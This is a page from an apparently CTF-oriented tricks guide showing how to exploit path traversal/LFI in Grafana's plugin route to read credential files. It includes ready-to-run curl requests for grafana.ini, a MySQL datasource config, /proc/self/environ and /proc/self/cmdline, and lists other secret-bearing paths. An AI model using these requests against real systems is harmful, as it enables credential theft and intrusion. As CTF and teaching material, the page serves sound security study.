> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/lfi/credentials-extraction/trick-0085.md).

# Extract Credentials from Config via LFI

***

Leveraging an arbitrary file read vulnerability (like LFI), target common application or system configuration files to extract credentials. Look for files in paths like `/etc/appname/`, `/opt/appname/`, or specific application data directories. These files often contain usernames, passwords, database connection strings, or API keys.

For example, to extract Grafana credentials or datasource configurations via LFI:

```bash
# Get Grafana admin password (if stored in grafana.ini and LFI path allows)
curl --path-as-is http://TARGET_IP:3000/public/plugins/mysql/../../../../../../../../etc/grafana/grafana.ini

# Get MySQL credentials from Grafana datasource config file
curl --path-as-is http://TARGET_IP:3000/public/plugins/mysql/../../../../../../../..//etc/grafana/provisioning/datasources/mysql.yaml
```

The default credentials for Grafana are often `admin`/`admin`. However, these are typically changed upon the first login.

Depending on the application and configuration format, retrieved passwords or secrets might need Base64 decoding. Base64 encoding is fundamentally used to represent binary data in an ASCII string format. This is often used for storing credentials within configuration files or data structures that expect text.

Common target paths include `/etc/nginx/nginx.conf`, `/etc/apache2/apache2.conf`, application-specific `.env` files, or database configuration files. Other potentially sensitive files that might be accessible via LFI include `/etc/passwd`, `/proc/self/cmdline`, and `/proc/self/environ`. The `/proc/self/environ` file can reveal environment variables, which might contain secrets or configuration details, while `/proc/self/cmdline` can show the command used to launch a process, sometimes including arguments with sensitive information.

For instance, accessing `/proc/self/environ` via LFI might look like:

```bash
curl --path-as-is "http://TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../proc/self/environ"
```

Similarly, `/proc/self/cmdline` could be accessed using a path like:

```bash
curl --path-as-is "http://TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../proc/self/cmdline"
```
